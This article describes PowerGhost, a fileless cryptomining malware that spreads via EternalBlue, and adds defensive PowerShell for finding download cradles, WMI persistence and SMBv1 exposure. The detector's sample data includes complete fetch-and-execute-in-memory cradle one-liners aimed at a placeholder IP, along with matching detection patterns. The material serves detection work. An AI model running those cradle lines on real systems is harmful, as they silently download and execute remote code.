The cryptocurrency boom has brought an increase in cybercrime. In recent months several exploited vulnerabilities have been reported, with losses running into millions of dollars that have put more than one company in serious trouble, compounded by harsh criticism from blockchain users.
One of the most common methods criminals use is spreading malicious programs, or malware, that once installed mine cryptocurrency with the victim's hardware, at the victim's expense.
Such malware usually spreads disguised inside other software, such as apps, browser extensions or VPN clients, putting at risk both the user's security and the machines it lands on.
Cybersecurity firm Kaspersky Lab has detected new malicious code that runs as a script on Windows machines, installs itself and operates stealthily and persistently, that is, it restarts itself even after the system is rebooted.
According to the research by the anti-virus developer, this malware, dubbed PowerGhost, uses the exploit known as EternalBlue (which targets the SMBv1 flaw Microsoft patched in March 2017 as MS17-010) to gain a foothold on one system and then spread to the other workstations and servers on the same network; this makes it a new way of attacking large corporate environments.
At the time of the report, Brazil, Colombia, India and Turkey were the countries most affected by this malicious code, with the United States, Western Europe and Russia hit to a lesser extent.
According to the research team's analysis, the exploit gives the attacker remote code execution on a vulnerable machine, and that is what is used to run the miner's launcher script.
“During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive,” the research reads.
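The quoted one-liner is the classic PowerShell "download cradle": fetch the payload over the network and hand it straight to the interpreter, so nothing is ever written to disk for a file scanner to find. The following is an added example, not Kaspersky's code and not anything taken from PowerGhost: a PowerShell function that scans script block text, such as what Windows records in Event ID 4104 when Script Block Logging is enabled, for the combination of a network fetch and an in-memory execute. The indicator patterns, the function name `Find-DownloadCradle` and the sample entries (with the documentation address 203.0.113.10 in place of a real server) are constructed for this illustration.

```powershell
# Added example: flag PowerShell script blocks that fetch code over the
# network and run it in memory (the "download and launch without writing
# to disk" pattern). Not Kaspersky's code and not PowerGhost's; the
# indicator lists and the sample events below are constructed.

function Find-DownloadCradle {
    [CmdletBinding()]
    param(
        # Script block text, e.g. the ScriptBlockText of Event ID 4104 entries.
        [Parameter(Mandatory, ValueFromPipeline)]
        [string[]]$ScriptText
    )
    begin {
        # Fetch indicators: the code pulls something over the network.
        $fetch = @(
            'New-Object\s+(System\.)?Net\.WebClient',
            '\.Download(String|Data|File)\s*\(',
            'Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b',
            'System\.Net\.Http\.HttpClient'
        )
        # Execute-in-memory indicators: what was fetched is run, not saved.
        $exec = @(
            '\bIEX\b|Invoke-Expression',
            '\[(System\.)?Reflection\.Assembly\]::Load\s*\(',
            '\[ScriptBlock\]::Create\s*\(',
            '-EncodedCommand|\s-e(nc|c)?\s'
        )
        # Launcher switches that hide the window or skip the profile; on
        # their own they are not malicious, but they raise the confidence.
        $stealth = @(
            '-WindowStyle\s+Hidden|\s-w\s+hidden',
            '-NoProfile|\s-nop\b',
            '-NonInteractive|\s-noni\b',
            '-ExecutionPolicy\s+Bypass|\s-ep\s+bypass'
        )
    }
    process {
        foreach ($text in $ScriptText) {
            # -match is case-insensitive by default, which is what we want here.
            $hits = [ordered]@{
                Fetch   = @($fetch   | Where-Object { $text -match $_ })
                Execute = @($exec    | Where-Object { $text -match $_ })
                Stealth = @($stealth | Where-Object { $text -match $_ })
            }
            # A cradle needs both halves: a fetch AND an in-memory execute.
            # A plain Invoke-WebRequest -OutFile is a download, not a cradle.
            $isCradle = ($hits.Fetch.Count -gt 0) -and ($hits.Execute.Count -gt 0)
            if (-not $isCradle)                 { $confidence = 'none' }
            elseif ($hits.Stealth.Count -gt 0)  { $confidence = 'high' }
            else                                { $confidence = 'medium' }

            [pscustomobject]@{
                Suspicious = $isCradle
                Confidence = $confidence
                Reasons    = ($hits.GetEnumerator() |
                              Where-Object { $_.Value.Count -gt 0 } |
                              ForEach-Object { "$($_.Key): $($_.Value -join '; ')" }) -join ' | '
                Sample     = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

# Constructed sample script block texts. Only the first and last are cradles;
# the third downloads to disk, which this check deliberately does not flag.
$samples = @(
    'powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(''http://203.0.113.10/a.txt'')',
    'Get-ChildItem C:\Logs | Where-Object Length -gt 1MB | Remove-Item',
    'Invoke-WebRequest -Uri https://example.org/report.csv -OutFile C:\Temp\report.csv',
    '$b = (New-Object Net.WebClient).DownloadData(''http://203.0.113.10/m''); [Reflection.Assembly]::Load($b)'
)

$samples | Find-DownloadCradle | Format-Table Suspicious, Confidence, Reasons -AutoSize

# On a host with Script Block Logging enabled, run the same check over the
# live log. Properties[2] of a 4104 event is the ScriptBlockText field.
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { $_.Properties[2].Value } | Find-DownloadCradle | Where-Object Suspicious
```

Two points worth knowing when you use this on real data: Script Block Logging records the decoded script, so a launcher that was passed as `-EncodedCommand` still shows its `IEX` and `DownloadString` in plain text; and the one-liner that starts the infection is also a process command line, so it will appear in process-creation auditing (Event ID 4688 with command-line logging, or Sysmon Event ID 1) even on hosts where Script Block Logging is off.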
In IT terms, an exploit is a piece of software, a command or a sequence of actions that takes advantage of a security flaw in a computer system to produce behaviour that suits the attacker's purposes.
Since hijacking computers to steal processing power for cryptocurrency mining, at the victim's expense, has become common, combining an exploit that lets the code spread on its own with a mining payload such as PowerGhost turns this class of program into a stealthy and dangerous threat. Because the miner body is launched from memory without ever being written to disk, a file-based antivirus scan alone will not catch it.
Kaspersky Lab explains that the malware harvests user credentials on the infected host, and then uses Windows Management Instrumentation (WMI) to download and launch the mining program on other machines.
Once the first computer is infected, the code propagates and updates itself automatically while keeping the mining process running.
Security experts' recommendations, besides always keeping corporate software up to date, which in this case means applying the SMB patch that closes EternalBlue and disabling SMBv1 wherever it is not needed, are to rely on dedicated security solutions to face threats like PowerGhost.
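The two things the article attributes to PowerGhost that a responder can check for on a host are persistence that survives a reboot and exposure to EternalBlue. The following is an added example, not Kaspersky's code and not anything from PowerGhost, written to run in an elevated PowerShell on Windows 8 / Server 2012 or later (it uses the `SmbShare` and `NetTCPIP` modules). The article does not name the persistence mechanism, so the script inspects permanent WMI event subscriptions, the common fileless way of surviving a reboot on Windows, as an assumption; the function names `Get-WmiSubscriptionReport` and `Test-EternalBlueExposure` are mine.

```powershell
# Added example: hunt for reboot-surviving WMI persistence and for
# EternalBlue exposure on the local Windows host. Not Kaspersky's code and
# not PowerGhost's. Assumes an elevated session on Windows 8 / Server 2012+.
# WMI event subscriptions are checked as the usual fileless persistence
# mechanism; the article itself does not say which one PowerGhost uses.

function Get-WmiSubscriptionReport {
    # Permanent WMI subscriptions live in root\subscription as three linked
    # objects: an __EventFilter (a WQL trigger, e.g. a timer or a boot
    # event), an __EventConsumer (the action) and a __FilterToConsumerBinding.
    $ns = 'root\subscription'

    $filters = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction Stop |
                 Select-Object Name, Query)

    $consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer | ForEach-Object {
        $c    = $_
        $kind = $c.CimClass.CimClassName
        # CommandLineEventConsumer starts a program, ActiveScriptEventConsumer
        # runs VBScript/JScript. Other kinds (such as the stock
        # NTEventLogEventConsumer "SCM Event Log Consumer") only write a log entry.
        if     ($kind -eq 'CommandLineEventConsumer')  { $payload = $c.CommandLineTemplate }
        elseif ($kind -eq 'ActiveScriptEventConsumer') { $payload = $c.ScriptText }
        else                                           { $payload = $null }
        [pscustomobject]@{
            Name     = $c.Name
            Kind     = $kind
            RunsCode = $kind -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer'
            Payload  = $payload
        }
    })

    $bindings = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding)

    [pscustomobject]@{
        Filters   = $filters
        Consumers = $consumers
        Bindings  = $bindings.Count
    }
}

function Test-EternalBlueExposure {
    # EternalBlue abuses SMBv1 (Microsoft fixed the flaw in MS17-010). A host
    # with SMBv1 disabled cannot be reached by it regardless of patch level;
    # a host with SMBv1 enabled must still be confirmed patched separately.
    $server = Get-SmbServerConfiguration -ErrorAction SilentlyContinue
    if ($server) { $smb1 = [bool]$server.EnableSMB1Protocol } else { $smb1 = $null }

    [pscustomobject]@{
        ComputerName     = $env:COMPUTERNAME
        Smb1Enabled      = $smb1
        # SMB is only reachable from other hosts if 445 is actually listening.
        Port445Listening = [bool](Get-NetTCPConnection -LocalPort 445 -State Listen -ErrorAction SilentlyContinue)
    }
}

$report = Get-WmiSubscriptionReport
"WMI filters: $($report.Filters.Count)  consumers: $($report.Consumers.Count)  bindings: $($report.Bindings)"

# Anything that runs code is worth reading in full; a clean install typically
# carries only the SCM Event Log filter/consumer pair, which does not.
$report.Consumers | Where-Object RunsCode | Format-List Name, Kind, Payload
$report.Filters   | Format-Table Name, Query -AutoSize

Test-EternalBlueExposure | Format-List
```

If `Smb1Enabled` comes back `True` on a host that has no legacy clients depending on it, `Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force` removes the EternalBlue attack surface outright; the patch state should still be tracked, since SMBv1 can be re-enabled. For a WMI consumer that runs code, remove the binding, the consumer and the filter together (each with `Remove-CimInstance`), otherwise the remaining pieces are easy to re-link.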